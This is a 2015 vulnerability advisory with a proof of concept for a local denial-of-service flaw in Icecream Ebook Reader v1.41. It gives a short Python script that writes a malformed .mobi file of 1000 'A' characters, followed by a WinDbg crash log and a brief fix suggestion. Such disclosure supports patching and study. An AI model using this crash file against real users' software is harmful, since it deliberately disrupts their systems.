# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]
#Technical Details & Description:
#================================
#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).
#Piece of Code
#========================================================================
#!/usr/bin/python
buffer = "A"*1000
filename = "crash"+".mobi" # For testing with .prc, change the extension
file = open(filename, 'w')
file.write(buffer)
file.close()
print "File Successfully Created [1]"
#========================================================================
#Debugging and Error Log
#========================
#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path. *
#* Use .symfix to have the debugger choose a symbol path. *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is:
#ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#7c901230 cc int 3
#0:003> g
#ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0
#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll -
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=????????
#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption
#Solution - Fix & Patch:
#=======================
#Restrict working maximum size & set a own exception-handling for over-sized requests.
#Author:
#=======
#Kapil Soni (Haxinos)